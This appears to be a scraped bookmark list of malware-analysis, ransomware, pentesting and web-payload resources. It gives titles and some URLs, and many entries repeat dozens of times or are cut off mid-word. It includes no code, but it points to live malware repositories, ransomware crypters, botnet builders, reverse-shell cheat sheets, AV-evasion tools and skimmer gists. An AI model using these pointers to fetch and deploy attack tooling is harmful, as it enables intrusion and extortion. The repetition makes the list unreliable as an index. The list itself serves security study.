Hashing

• Unprotect
• Signed Malware – The Dataset
• Awesome Malware Analysis
• course
• CS6038/CS5138 Malware Analysis, UC - Malware-Analysis)
• list
• IKARUS anti.virus and its 9 exploitable kernel vulnerabilities
• Digital Certificates Used by Malware
• Malware Sample Sources for Researchers
• Indicators: Champing at the Cyberbit
• binary ninja
• OSX/MaMi
• mal100.evad.spre.rans.spyw.troj.winEXE@34/9@31/10
• Chaos: a Stolen Backdoor Rising Again
• EternalGlue part two: A rebuilt NotPetya gets its first execution outside of the lab
• Forgot About Default Accounts? No Worries, GoScanSSH Didn’t
• TESSERACT: Eliminating Experimental Bias in Malware Classification across Space and Time
• Source Code for Exobot Android Banking Trojan Leaked Online
• Ramnit’s Network of Proxy Servers
• A malware analysis kit for the novice
• When a malware is more complex than the paper.
• Gh0st
• What you need to know about “LoJax”—the new, stealthy malware from Fancy Bear
• PHP Malware Examination
• Analysis of Linux.Haikai
• Cylance vs. MBRKiller Wiper Malware
• Deep Analysis of TrickBot New Module pwgrab
• Mac malware combines EmPyre backdoor and XMRig miner
• The Full Guide Understanding Fileless Malware Infections
• 'Injection' Without Injection
• Analysis of Neutrino Bot Sample - 08-27): In this post I analyze a Neutrino Bot sample.
• Thunderstrike2 details
• Malboxes
• Triton is the world’s most murderous malware, and it’s spreading
• Cloak and Dagger — Mobile Malware Techniques Demystified
• Welcome to the Dark Side: Part 1
• Welcome to the Dark Side: Part 2-1
• Welcome to the Dark Side: Part 2-2
• Welcome to the Dark Side: Part 3
• Welcome to the Dark Side: Part 4
• Command and Control via TCP Handshake
• wdeQEksXgm
• emotet - malware-IoCs_09-18-19.html)
• Anti-VM Technique with MSAcpi_ThermalZoneTemperature
• AMSI as a Service - less malware visible to AV engines.
• Unprotect
• FRITZFROG - TO-PEER BOTNETS. [detection script](https://github.com/guardicore/labs_campaigns/tree/master/FritzFrog)
• malware analysis and machine learning
• GhostDNSbusters
• The Tetrade
• Is macOS under the biggest malware attack ever?
• Hybrid Analysis
• Part 1: The Black-Box Approach
• The Art Of Mac Malware: Analysis
• Sandbox detection and evasion techniques. How malware has evolved over the last 10 years
• Go Assembly on the arm64
• Exploit Kit still sharpens a sword
• Pingback
• WinAPI-Tricks
• Cuckoo Sandbox Overview
• Malvuln
• Vigilante malware rats out software pirates while blocking ThePirateBay
• Necro Python bot adds new exploits and Tezos mining to its bag of tricks
• Made in China: OSX.ZuRu
• DBatLoader: Abusing Discord to Deliver Warzone RAT
• Siloscape
• DRIDEX
• The Return of the Malwarebytes Crackme - crackme-3): Writeup and scripts for the 2021 malwarebytes crackme. [Malwarebytes CrackMe 3 2021 Solution](https://rainbowpigeon.me/posts/malwarebytes-crackme-3-2021/)
• Corvus
• MalAPI.io
• Malicious Document Analysis: Example 1 - 1.pdf)
• APIVADS - Preserving Pivot Attack Detection Scheme Based On Statistical Pattern Recognition
• Unprotect
• Chaos: a Stolen Backdoor Rising Again
• Unprotect
• Unprotect
• Unprotect
• Unprotect
• Malboxes
• Unprotect
• Unprotect
• A malware analysis kit for the novice
• Unprotect
• Unprotect
• Too Log; Didn't Read — Unknown Actor Using CLFS Log Files for Stealth
• A new secret stash for “fileless” malware
• What you need to know about “LoJax”—the new, stealthy malware from Fancy Bear
• Unprotect
• Unprotect
• Unprotect
• Unprotect
• Unprotect
• Unprotect
• Unprotect
• Unprotect
• Unprotect
• Unprotect
• Unprotect
• Unprotect
• Unprotect
• Unprotect
• Unprotect
• Unprotect
• Unprotect
• Unprotect
• Unprotect
• Unprotect
• Unprotect
• Unprotect
• Unprotect
• Unprotect
• Unprotect
• Unprotect
• Unprotect
• A collection of tools for working with TrickBot
• imaginaryC2 - and-Control responses/served payloads.
• A collection of x64dbg scripts
• Unprotect
• Unprotect
• Unprotect
• Unprotect
• Unprotect
• Unprotect
• Unprotect
• Unprotect
• Unprotect
• Unprotect
• When a malware is more complex than the paper.
• Cloak and Dagger — Mobile Malware Techniques Demystified
• Anti-VM Technique with MSAcpi_ThermalZoneTemperature
• Unprotect
• IKARUS anti.virus and its 9 exploitable kernel vulnerabilities
• Limon - Sandbox for Analyzing Linux Malwares
• Framework for building Windows malware, written in C++
• al-khaser
• Malware Indicators of Compromise (IOCs)
• Puszek
• Joe Sandbox Cloud - API Wrapper.
• Cuckoo Sandbox
• CBG
• makin - reveal anti-debugging and anti-VM tricks.
• snake
• malware-ioc
• pftriage
• Vba2Graph - Generate call graphs from VBA code, for easier analysis of malicious documents.
• malwoverview
• Gh0st
• Linux.Malware
• multiscanner
• FCL - Known command lines of fileless malicious executions.
• Analysis of Neutrino Bot Sample - 08-27): In this post I analyze a Neutrino Bot sample.
• pafish
• Malboxes
• Triton is the world’s most murderous malware, and it’s spreading
• IceBox
• Aleph
• Aleph
• DRAKVUF Sandbox - automated hypervisor-level malware analysis system.
• Unprotect
• HiJackThis Fork v3
• ember
• Complementar resources to follow the EHREM course by GoHacking (Malware Reverse Engineering)
• Coldfire
• pei - Inject code on 32-bit and 64-bit PE executables
• Sandbox detection and evasion techniques. How malware has evolved over the last 10 years
• malware_training_vol1
• pyWhat
• Transacted Hollowing
• Cuckoo Sandbox Overview
• Malware Scarecrow
• Qu1cksc0pe - in-One malware analysis tool.
• list
• A Dynamic Binary Instrumentation framework based on LLVM
• OSX/MaMi
• Joe Sandbox Cloud - API Wrapper.
• CBG
• Forgot About Default Accounts? No Worries, GoScanSSH Didn’t
• colental/byob: BYOB (Build Your Own Botnet)
• Ramnit’s Network of Proxy Servers
• snake
• Cylance vs. MBRKiller Wiper Malware
• Deep Analysis of TrickBot New Module pwgrab
• Mac malware combines EmPyre backdoor and XMRig miner
• Thunderstrike2 details
• Malboxes
• Triton is the world’s most murderous malware, and it’s spreading
• CAPA - source tool to identify capabilities in executable files. [capa-rules](https://github.com/fireeye/capa-rules)
• Tracking A Malware Campaign Through VT
• speakeasy
• malware analysis and machine learning
• GhostDNSbusters
• Complementar resources to follow the EHREM course by GoHacking (Malware Reverse Engineering)
• Freki
• Cuckoo Sandbox Overview
• Machine Learning for Static Malware Analysis, with University College London
• Necro Python bot adds new exploits and Tezos mining to its bag of tricks
• Made in China: OSX.ZuRu

Malware Samples

• Architecture of a ransomware
• Ryuk’s Return
• Automated Malware Analysis Report for D6pnpvG2z7 - Generated by Joe Sandbox
• Mac Malware
• Detricking TrickBot Loader - stealer called Dyre. It is still believed that those two families might’ve been developed by the same actor. [decoder](https://raw.githubusercontent.com/k-vitali/Malware-Misc-RE/master/2019-07-29-trickbot-decoded-first-loader-template.vk.raw), [tweet](https://twitter.com/VK_Intel/status/1155923795674316801)
• Analysis of Emotet v4
• abuse.ch Feodo Tracker Botnet C2 IP Blocklist
• Mirai "Batkek"
• FinFisher Filleted 🐟
• Ryuk Ransomware
• Collaboration between FIN7 and the RYUK group, a Truesec Investigation
• Architecture of a ransomware
• After finding skimmers in SVG files last week, we now discovered a #magecart skimmer in perfectly valid CSS.
• #Buer #BuerLoader
• Purple Fox Rootkit Now Propagates as a Worm
• How to analyze mobile malware: a Cabassous/FluBot Case study
• Malware Analysis of a Password Stealer
• Guildma
• Darkside RaaS in Linux version
• Architecture of a ransomware
• Analysis of Emotet v4
• Architecture of a ransomware
• Architecture of a ransomware
• Architecture of a ransomware
• Architecture of a ransomware
• Architecture of a ransomware
• Collaboration between FIN7 and the RYUK group, a Truesec Investigation
• Architecture of a ransomware
• Detricking TrickBot Loader - stealer called Dyre. It is still believed that those two families might’ve been developed by the same actor. [decoder](https://raw.githubusercontent.com/k-vitali/Malware-Misc-RE/master/2019-07-29-trickbot-decoded-first-loader-template.vk.raw), [tweet](https://twitter.com/VK_Intel/status/1155923795674316801)
• Architecture of a ransomware
• Darkside RaaS in Linux version
• Architecture of a ransomware
• Architecture of a ransomware
• Architecture of a ransomware
• Architecture of a ransomware
• Architecture of a ransomware
• Architecture of a ransomware
• Architecture of a ransomware
• Architecture of a ransomware
• Architecture of a ransomware
• Architecture of a ransomware
• Architecture of a ransomware
• Architecture of a ransomware
• Architecture of a ransomware
• Architecture of a ransomware
• Architecture of a ransomware
• Architecture of a ransomware
• Architecture of a ransomware
• Architecture of a ransomware
• Architecture of a ransomware
• Architecture of a ransomware
• Architecture of a ransomware
• Architecture of a ransomware
• Architecture of a ransomware
• Architecture of a ransomware
• Architecture of a ransomware
• Architecture of a ransomware
• Architecture of a ransomware
• Architecture of a ransomware
• Guildma
• SoReL-20M - ReversingLabs 20 million sample dataset.
• Architecture of a ransomware
• virii
• simple_ransomware
• Android-Malware-Samples
• Architecture of a ransomware
• Malware Samples
• Darkside RaaS in Linux version
• Mac Malware
• FinFisher Filleted 🐟
• After finding skimmers in SVG files last week, we now discovered a #magecart skimmer in perfectly valid CSS.
• #Buer #BuerLoader
• minizinh0-FUD

Malware Articles and Sources

• “VANILLA” malware
• “VANILLA” malware
• “VANILLA” malware
• A Mix of Python & VBA in a Malicious Word Document
• MalwareAnalysisForHedgehogs
• EMOTET
• A MIPS-32 ELF non-resident virus with false disassembly
• Linux.Kropotkine.asm
• A WILD KOBALOS APPEARS - ioc/tree/master/kobalos)
• List of victim organizations attacked by Ransomware gangs released on the DarkWeb
• “VANILLA” malware
• “VANILLA” malware
• “VANILLA” malware
• “VANILLA” malware
• “VANILLA” malware
• “VANILLA” malware
• “VANILLA” malware
• “VANILLA” malware
• “VANILLA” malware
• “VANILLA” malware
• 2020-10-22 - TRAFFIC ANALYSIS EXERCISE - OMEGACAST
• “VANILLA” malware
• “VANILLA” malware
• “VANILLA” malware
• “VANILLA” malware
• “VANILLA” malware
• “VANILLA” malware
• “VANILLA” malware
• “VANILLA” malware
• “VANILLA” malware
• “VANILLA” malware
• “VANILLA” malware
• “VANILLA” malware
• “VANILLA” malware
• “VANILLA” malware
• “VANILLA” malware
• “VANILLA” malware
• “VANILLA” malware
• “VANILLA” malware
• “VANILLA” malware
• “VANILLA” malware
• “VANILLA” malware
• “VANILLA” malware
• “VANILLA” malware
• “VANILLA” malware
• “VANILLA” malware
• “VANILLA” malware
• “VANILLA” malware
• “VANILLA” malware
• “VANILLA” malware
• “VANILLA” malware
• “VANILLA” malware
• “VANILLA” malware
• “VANILLA” malware
• A Mix of Python & VBA in a Malicious Word Document
• MalwareAnalysisForHedgehogs
• A WILD KOBALOS APPEARS - ioc/tree/master/kobalos)

Web Malwares

• Boa release
• New evasion techniques found in web skimmers
• digital skimming / #magecart technique for injecting convincing PayPal iframes into the checkout process - anywhere](https://gist.github.com/krautface/e9fece3a3271bc19bd198a72fa8f363e), [stega-loader](https://gist.github.com/krautface/47144708de5ebf78713db10bb486ea87), [paypal-cors-deob-good.js](https://gist.github.com/krautface/dee181bec40b8e99e21fc932d9922df2), [paypal-cors-deob-with-comments.js](https://gist.github.com/krautface/933b050eb363e20cf1bc925c87a9290f), [fake-paypal.html](https://gist.github.com/krautface/243aabc63f6f7424ff75e8e9cbd35016)
• midrashim
• d0zer
• New evasion techniques found in web skimmers
• Boa release
• digital skimming / #magecart technique for injecting convincing PayPal iframes into the checkout process - anywhere](https://gist.github.com/krautface/e9fece3a3271bc19bd198a72fa8f363e), [stega-loader](https://gist.github.com/krautface/47144708de5ebf78713db10bb486ea87), [paypal-cors-deob-good.js](https://gist.github.com/krautface/dee181bec40b8e99e21fc932d9922df2), [paypal-cors-deob-with-comments.js](https://gist.github.com/krautface/933b050eb363e20cf1bc925c87a9290f), [fake-paypal.html](https://gist.github.com/krautface/243aabc63f6f7424ff75e8e9cbd35016)

Repos

• malware.one
• Beginner Malware Reversing Challenges - Reversing-Challenges)
• MalwareWorld
• MalwareBazaar
• What is MWDB Core? - core](https://github.com/CERT-Polska/mwdb-core): Malware repository component for samples & static configuration with REST API interface.
• Malpedia
• What is MWDB Core? - core](https://github.com/CERT-Polska/mwdb-core): Malware repository component for samples & static configuration with REST API interface.
• A repository of LIVE malwares for your own joy and pleasure
• Beginner Malware Reversing Challenges - Reversing-Challenges)
• LOLBITS - mode hooking evasion.
• C2Matrix

Ransomwares

• Mespinoza Analysis — New ransomware variant targets France
• Player 3 Has Entered the Game: Say Hello to 'WannaCry'
• WannaCry|WannaDecrypt0r NSA-Cyberweapon-Powered Ransomware Worm
• Ransomware Overview
• Analyzing GrandSoft Exploit Kit
• Tracking REvil
• Sodinokibi (aka REvil) Ransomware
• REvil Master Key for Kaseya Attack Posted to XSS
• After the ransom was paid, the attackers even provided some bonus security advice!
• Introducing COLT – Compromise to Leak Time
• Sophisticated new Android malware marks the latest evolution of mobile ransomware
• Genetic Analysis of CryptoWall Ransomware
• Brazilian Justice Court Ransomware: Another piece in the Puzzle
• A Ransomware has landed! @Embraer
• RANSOMWARE GUIDANCE AND RESOURCES
• No More Ransom!
• PYSA/Mespinoza Ransomware
• PYSA Ransomware
• RANSOM MAFIA.ANALYSIS OF THE WORLD’S FIRST RANSOMWARE CARTEL
• Some #PYSA / #Mespinoza #Ransomware Samples
• Cerber Ransomware
• RansomEXX Trojan attacks Linux systems
• FIN7 - Lizar client Interface version 2.0.4
• Sleuthing DarkSide Crypto-Ransom Payments with the Wolfram Language
• Apostle Ransomware Analysis
• From Wiper to Ransomware | The Evolution of Agrius
• Hades Ransomware Operators Use Distinctive Tactics and Infrastructure
• BlackMatter x64 Linux Variant | esxcli variant - vitali/Malware-Misc-RE/blob/master/2021-08-05-blackmatter-ransom-linux-esxcli-func-vk.raww)
• Teaching an Old Dog New Tricks: 2017 Magniber Ransomware Uses PrintNightmare Vulnerability to Infect Victims in South Korea
• RansomExx Renner
• RANSOMWHERE
• Ransomware Actor Abuses Genshin Impact Anti-Cheat Driver to Kill Antivirus - cheat driver for the popular role-playing game Genshin Impact. The driver is currently being abused by a ransomware actor to kill antivirus processes and services for mass-deploying ransomware.
• Rapidly Evolving Ransomware GandCrab Version 5 Partners With Crypter Service for Obfuscation
• Smoking Out a DARKSIDE Affiliate’s Supply Chain Software Compromise
• Schroedinger’s Pet(ya)
• Ransomware decryption tool
• hidden-tear - like file crypter sample which can be modified for specific purposes.
• Phirautee - party libraries. This tool steals the information, holds an organisation’s data to hostage for payments or permanently encrypts/deletes the organisation data.
• Raccine
• Smoking Out a DARKSIDE Affiliate’s Supply Chain Software Compromise
• Miscellaneous Malware RE
• BlackByteDecryptor
• RANSOMWARE GUIDANCE AND RESOURCES
• RansomExx Renner
• Player 3 Has Entered the Game: Say Hello to 'WannaCry'
• Analyzing GrandSoft Exploit Kit
• Tracking REvil
• REvil Master Key for Kaseya Attack Posted to XSS
• After the ransom was paid, the attackers even provided some bonus security advice!
• Sophisticated new Android malware marks the latest evolution of mobile ransomware
• Some #PYSA / #Mespinoza #Ransomware Samples
• Cerber Ransomware
• FIN7 - Lizar client Interface version 2.0.4
• From Wiper to Ransomware | The Evolution of Agrius
• BlackMatter x64 Linux Variant | esxcli variant - vitali/Malware-Misc-RE/blob/master/2021-08-05-blackmatter-ransom-linux-esxcli-func-vk.raww)

Virus/Anti-Virus

• Avast open-sources its machine-code decompiler
• make a process unkillable?!
• Attack inception
• Curtis' Blog: Bypassing Next Gen AV During a Pentest
• BinariesThatDoesOtherStuff
• The ELF Virus Writing HOWTO
• Virus Total API in Python
• Antivirus Event Analysis Cheat Sheet v1.7.2
• UglyEXe
• Engineering antivirus evasion
• An Empirical Assessment of Endpoint Security Systems Against Advanced Persistent Threats Attack Vectors
• Attack inception
• The ELF Virus Writing HOWTO
• Inception - memory compilation and reflective loading of C# apps for AV evasion.
• Morris worm
• Invoke-NeutralizeAV
• Circlean
• mcreator
• metame - metame-is-metamorphic-code.html).
• rustdsplit - based AV. The tool I used back then is gone, so I wrote this.
• VirusTotal CLI
• avcleaner
• VxSig
• Inception - memory compilation and reflective loading of C# apps for AV evasion.
• The ELF Virus Writing HOWTO

Trojans/Loggers

• IcedID Banking Trojan Shares Code with Pony 2.0 Trojan
• Turla
• QMKhuehuebr

ARM

• Serverless Toolkit for Pentesters
• Spawning a TTY Shell
• foxyproxy.json
• Linux for Pentester
• Part 1
• Part 2
• Part 3
• Part 4
• DNS and DHCP Recon using Powershell
• Several ways to download and execute malicious codes (LOLBAS)
• Nikto: A Practical Website Vulnerability Scanner
• NetAss2 - id/NetAss2).
• HACKING WITH ENVIRONMENT VARIABLES
• Pentesting Cheatsheets
• HAck Tricks
• coregen.exe
• fiddler
• Sec4US's cheatsheets - training/cheatsheets) about shellcoding and bufferoverflow.
• A Noob Guide to setup your Own OOB DNS Server - of-Band DNS Bind Server](https://github.com/JuxhinDB/OOB-Server): A Bind9 server for pentesters to use for Out-of-Band vulnerabilities.
• Pre-engagement
• pentest, should I do it?
• Penetration Testing - An Introduction
• Operator's Decalogue
• LOTS
• Filesec.io - to-date with the latest file extensions being used by attackers.
• White Box Penetration Testing: “Cheating” in order to boost impact and value
• Install the Microsoft signed Hybrid Connection Manager on victim host, link it up with your Azure app, enjoy persistent access to the on-prem network from your Azure portal.
• From Python to .Net
• White Box Penetration Testing: “Cheating” in order to boost impact and value
• Python Penetration Testing Cheat Sheet
• osquery Across the Enterprise
• osquery
• osquery Across the Enterprise
• Part 2
• Part 3
• Part 4
• DarkSpiritz
• osquery Across the Enterprise
• Intrusion Detection
• Part 0
• Part 1
• Pentest Tips and Tricks
• "EAST" PENTEST FRAMEWORK
• IoT Pentesting - PT](https://github.com/IoT-PTv/IoT-PT): A Virtual environment for Pentesting IoT Devices
• osquery Across the Enterprise
• White Box Penetration Testing: “Cheating” in order to boost impact and value
• Proxyjump, the SSH option you probably never heard of
• PwnWiki.io
• osquery Across the Enterprise
• IVRE - sec/ivre)).
• LeakLooker - ciech/LeakLooker)
• Insecure Direct Object References - AUTHZ-004)
• CSS Injection Primitives
• Several ways to download and execute malicious codes (LOLBAS)
• Sec4US's cheatsheets - training/cheatsheets) about shellcoding and bufferoverflow.
• White Box Penetration Testing: “Cheating” in order to boost impact and value
• osquery Across the Enterprise
• White Box Penetration Testing: “Cheating” in order to boost impact and value
• osquery Across the Enterprise
• osquery Across the Enterprise
• White Box Penetration Testing: “Cheating” in order to boost impact and value
• osquery Across the Enterprise
• liffy
• Several ways to download and execute malicious codes (LOLBAS)
• DNSLOG
• Several ways to download and execute malicious codes (LOLBAS)
• TIDoS-Framework
• Several ways to download and execute malicious codes (LOLBAS)
• osquery Across the Enterprise
• White Box Penetration Testing: “Cheating” in order to boost impact and value
• White Box Penetration Testing: “Cheating” in order to boost impact and value
• osquery Across the Enterprise
• MarkBaggett’s gists
• Penetration Testing Tools Cheat Sheet ∞
• White Box Penetration Testing: “Cheating” in order to boost impact and value
• osquery Across the Enterprise
• osquery Across the Enterprise
• White Box Penetration Testing: “Cheating” in order to boost impact and value
• osquery Across the Enterprise
• White Box Penetration Testing: “Cheating” in order to boost impact and value
• osquery Across the Enterprise
• osquery Across the Enterprise
• White Box Penetration Testing: “Cheating” in order to boost impact and value
• osquery Across the Enterprise
• White Box Penetration Testing: “Cheating” in order to boost impact and value
• osquery Across the Enterprise
• White Box Penetration Testing: “Cheating” in order to boost impact and value
• osquery Across the Enterprise
• White Box Penetration Testing: “Cheating” in order to boost impact and value
• osquery Across the Enterprise
• White Box Penetration Testing: “Cheating” in order to boost impact and value
• osquery Across the Enterprise
• osquery Across the Enterprise
• osquery Across the Enterprise
• White Box Penetration Testing: “Cheating” in order to boost impact and value
• osquery Across the Enterprise
• White Box Penetration Testing: “Cheating” in order to boost impact and value
• osquery Across the Enterprise
• White Box Penetration Testing: “Cheating” in order to boost impact and value
• osquery Across the Enterprise
• White Box Penetration Testing: “Cheating” in order to boost impact and value
• osquery Across the Enterprise
• White Box Penetration Testing: “Cheating” in order to boost impact and value
• osquery Across the Enterprise
• osquery Across the Enterprise
• osquery Across the Enterprise
• osquery Across the Enterprise
• IoTSecurity101
• PentestHardware
• Penetration Test Guide based on the OWASP + Extra - TEST. I hope it will be useful in both penetration test projects and bug-bounty.
• Micro8 - test, network security enthusiasts, etc., enterprise security protection and improvement, the series complies with: Free, free, shared, open source.
• PENTESTING-BIBLE
• Weird Proxies
• osquery Across the Enterprise
• osquery Across the Enterprise
• osquery Across the Enterprise
• Several ways to download and execute malicious codes (LOLBAS)
• Several ways to download and execute malicious codes (LOLBAS)
• Awesome Penetration Testing
• Seclists
• osquery Across the Enterprise
• fleet
• Script to steal passwords from ssh.
• Network Infrastructure Penetration Testing Tool
• tcp connection hijacker
• Pown.js
• Sandmap
• trackerjacker
• GitMiner
• DHCPwn
• badKarma
• Danger-zone
• go-tomcat-mgmt-scanner
• red_team_telemetry
• SharpSploitConsole
• CrackMapExec
• proxycannon-ng - Built by the community during a hackathon at the WWHF 2018 security conference
• pentest_scripts
• DomainInformation - mail. Tenta fazer transferência de zona, Busca por subdomínios e por ultimo, procura por portas abertas em cada ip dos subdomínios.. Desfrutem =)
• pown-recon
• Payloads All The Things
• Order of the Overflow Proxy Service
• pentest_compilation
• Presentation Clickers
• postwoman - A free, fast, and beautiful alternative to Postman.
• SiteBroker - platform python based utility for information gathering and penetration testing automation!
• Nikto
• physical-docs
• pentest-tools
• rootend
• DroneSploit
• Huawei_Thief
• urldozer
• Snaffler
• Several ways to download and execute malicious codes (LOLBAS)
• Jok3r - framework.com/)
• Penetration Testing Cheat Sheet
• BBT - Bug Bounty Tools
• P4wnP1 A.L.O.A. - cost platform for pentesting, red teaming and physical engagements ... or into "A Little Offensive Appliance".
• AriaCloud
• RustScan
• Impacket
• PwnWiki.io
• post-exploitation
• GLORP - based HTTP intercept and replay proxy
• SMB AutoRelay
• Decoder++
• SCShell
• bulwark
• Interactsh
• DNSLOG
• Pre-engagement
• pwncat - injecting shell and port forwarding magic - and its fully scriptable with Python (PSE)
• offensiveph - mode access controls.
• mitmproxy - capable intercepting HTTP proxy for penetration testers and software developers](https://mitmproxy.org/).
• Poor Man's Pentest
• EMBArk
• EMBA
• OffensiveNim
• Intrusion Detection
• Part 0
• Part 1
• Part 2
• Part 3
• Part 4
• Got Meterpreter? PivotPowPY!
• pentesting tool for finding vulnerabilities in web applications
• Part 1
• Part 2
• Part 3
• Part 4
• NetAss2 - id/NetAss2).
• HAck Tricks
• Several ways to download and execute malicious codes (LOLBAS)
• 21 - Pentesting FTP
• Pentesting 101: Working With Exploits
• Install the Microsoft signed Hybrid Connection Manager on victim host, link it up with your Azure app, enjoy persistent access to the on-prem network from your Azure portal.
• From Python to .Net

Payloads

• LaTex Injection
• CSV-Injection
• Directory Traversal
• Which Security Risks Do CORS Imply?
• Cross-Origin Resource Sharing (CORS)
• SSRF Tips
• Exploiting JNDI Injections in Java
• MSFVenom Reverse Shell Payload Cheatsheet (with & without Meterpreter)
• Creating Metasploit Payloads
• BYPASSING ANTIVIRUS WITH MSFVENOM
• Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
• Awesome one-liner bug bounty
• Dangerous Injections
• OAuth 2.0 Hacking Simplified — Part 2 — Vulnerabilities and Mitigation
• Handling Short Expiration Time of Authorization Tokens
• Reverse Shell Cheat Sheet
• Awesome one-liner bug bounty
• Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
• Payloads Collection
• Criando Payloads de Shell Reverso com MSFVenom
• Hiding Metasploit Shellcode to Evade Windows Defender
• MSFVenom Cheatsheet
• Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
• Starting a handler with Metasploit
• Awesome one-liner bug bounty
• Two Rights Might Make A Wrong
• You always hear stories about how bug bounty programs steal your bug, but very few people post about it, or have the 100% proof to show this.
• 0-Day Hunting (Chaining Bugs/Methodology)
• Introducing CookieMonster
• CRLF
• Top Penetration Testing & Bug Hunting YouTube Channels you should follow - Updated 11/19/2020
• Our top tips for better bug bounty reports, plus a hacker contest!
• KindleDrip
• Amazon Kindle Vulnerabilities Could Have Led Threat Actors to Device Control and Information Theft
• How I Might Have Hacked Any Microsoft Account
• alert() is dead, long live print()
• If you do use BBRF, here it is a initial script to use HackerOne API to gather all programs' scope, including your private programs.
• OOB reads in network message handlers leads to RCE
• Bug Bounty Resources
• Google Bug Hunters
• Server Side Request Forgery
• CRLF Injection
• Command Injection
• $4,000 Starbucks secondary context path traversal
• Crypto
• OAuth
• Presenting The Pwning-Machine, a versatile and easy to setup Bug bounty environment.
• Dangerous Injections
• LFI
• fimap
• File Inclusion
• Open-Redirect
• RCE
• Template Injection
• SSTI
• XSLT
• LDAP Injection
• NoSQL Injection
• ISCM
• Bypass Upload Tricky
• Web Security CheatSheet
• Dangerous Injections
• Blind SQL Injection at fasteditor.hema.com
• SQL Injection 101: How to Fingerprint Databases & Perform General Reconnaissance for a More Successful Attack
• SQL injection cheat sheet
• From SQL Injection to Shell: PostgreSQL edition
• Pentesting PostgreSQL with SQL Injections
• 1 - sleuth.com/sleuth-blog/2017/1/3/sqlmap-cheat-sheet), [4](https://thedarksource.com/sqlmap-cheat-sheet/), [tamper scripts](https://gist.github.com/sapran/a12bd98cf212237ac9678d48f5152941)
• Bypassing CSRF tokens with Python’s CGIHTTPServer to exploit SQL injections
• Advanced request smuggling
• Reflected XSS on www.hackerone.com via Wistia embed code
• Security impact of a misconfigured CORS implementation
• Examining the database in SQL injection attacks
• SQLi
• SleuthQL
• Postgres SQL Injection Cheat Sheet
• SQLite Injection
• SQL injection
• CSRF Injection
• Practical Attacks Using HTTP Request Smuggling
• HAProxy HTTP request smuggling - 2019-18277)
• The Powerful HTTP Request Smuggling
• h2c Smuggling
• Cross-site scripting (XSS) cheat sheet
• xss cheatsheet
• an XSS payload, Cuneiform-alphabet based
• Find reflected parameters with Burp_Suite
• How to solve a challenge from Intigriti in under 60 minutes
• How to win at CORS
• SSRF Search & Destroy
• SSRF
• Server Side Request Forgery on MISP - 2020-28043.
• SSRF (Server Side Request Forgery) worth $4,913 | My Highest Bounty Ever !
• Unauthenticated Full-Read SSRF in Grafana - 2020-13379
• Out of Band XXE in an E-commerce IOS app
• Comprehensive Guide on XXE Injection
• XXE
• SerialVersionUID in Java
• New XML technique! Encode any DTD/XML inside an internal entity, and fly under WAF radars!
• XXE_payloads
• FAR SIDES OF JAVA REMOTE PROTOCOLS
• Serialization and deserialization in Java: explaining the Java deserialize vulnerability
• Orange: How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE!
• code white | Blog: Liferay Portal JSON Web Service RCE Vulnerabilities
• How to Insomnia for GraphQL requests
• InQL Scanner
• Online Protobuf Decoder.
• LazySSTICheck
• Easily Identify Malicious Servers on the Internet with JARM
• Apache Tomcat Deserialization of Untrusted Data RCE (CVE-2020–9484) - tomcat/java/org/apache/naming/factory/BeanFactory.java): java/org/apache/naming/factory/BeanFactory.java - good to use for JRMI abuse
• How to exploit Liferay CVE-2020-7961 : quick journey to PoC
• How I Hacked Facebook Again! Unauthenticated RCE on MobileIron MDM
• Serialization: the big threat
• Fear of the Unknown: A Metanalysis of Insecure Object Deserialization Vulnerabilities
• Testing and exploiting Java Deserialization in 2021
• Queries and Mutations
• GraphQL Injection
• OAuth 2.0 Hacking Simplified — Part 2 — Vulnerabilities and Mitigation
• Burp Suite Cheat Sheet
• Hacking Starbucks and Accessing Nearly 100 Million Customer Records
• OAuth 2.0 Hacking Simplified — Part 2 — Vulnerabilities and Mitigation
• Fugu API Tracker - company effort to make it possible for web apps to do anything iOS, Android, or desktop apps can, by exposing the capabilities of these platforms to the web while maintaining user security, privacy, trust, and other core tenets of the web.
• Part 2 – Testing
• Part 1 – Introduction & Configuration
• Part 3 – Reporting
• Deploying a private Burp Collaborator server
• create a Passive Profile for a param value, like *testsqli* and then create a Rule with this Profile to trigger SQLi active profile.
• Handling Short Expiration Time of Authorization Tokens
• Howto install and use the Burp Suite as HTTPS Proxy on Ubuntu 14.04
• API testing with Swurg for Burp Suite
• Handling Short Expiration Time of Authorization Tokens
• IDOR
• OAuth 2.0 Hacking Simplified — Part 2 — Vulnerabilities and Mitigation
• Handling Short Expiration Time of Authorization Tokens
• Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
• Awesome one-liner bug bounty
• get-title
• CSV Injection
• Content Injection
• XPATH Injection
• SQL injection
• Blind SQL injection
• Dangerous Injections
• The Ultimate SQL Injection Cheat Sheet
• Blind SQL Injection Detection and Exploitation (Cheat Sheet)
• Portable Data exFiltration: XSS for PDFs - data-exfiltration)
• XSS Hunter - site scripting vulnerabilities, including the often-missed blind XSS. The service works by hosting specialized XSS probes which, upon firing, scan the page and send information about the vulnerable page to the XSS Hunter service. [xss hunter shortcut](http://xss.ht/)
• CORS'ing a Denial of Service via cache poisoning
• Server-Side Request Forgery using Javascript allows to exfill data from Google Metadata
• Blind SSRF Chains
• Java Serialization Magic Methods And Their Uses With Example
• CSM_Pocs - class security management application that provides insight into and control of Cisco security and network devices.
• JWT Vulnerabilities (Json Web Tokens)
• Attacking Secondary Contexts in Web Applications
• OAuth 2.0 Hacking Simplified — Part 2 — Vulnerabilities and Mitigation
• SELF-HOSTED BURP COLLABORATOR FOR FUN AND PROFIT - vulnerabilities and exfiltrate data.
• AES-Killer v3.0
• Handling Short Expiration Time of Authorization Tokens
• Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
• Awesome one-liner bug bounty
• Dangerous Injections
• Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
• Awesome one-liner bug bounty
• Dangerous Injections
• OAuth 2.0 Hacking Simplified — Part 2 — Vulnerabilities and Mitigation
• Handling Short Expiration Time of Authorization Tokens
• Shikata Ga Nai Encoder Still Going Strong
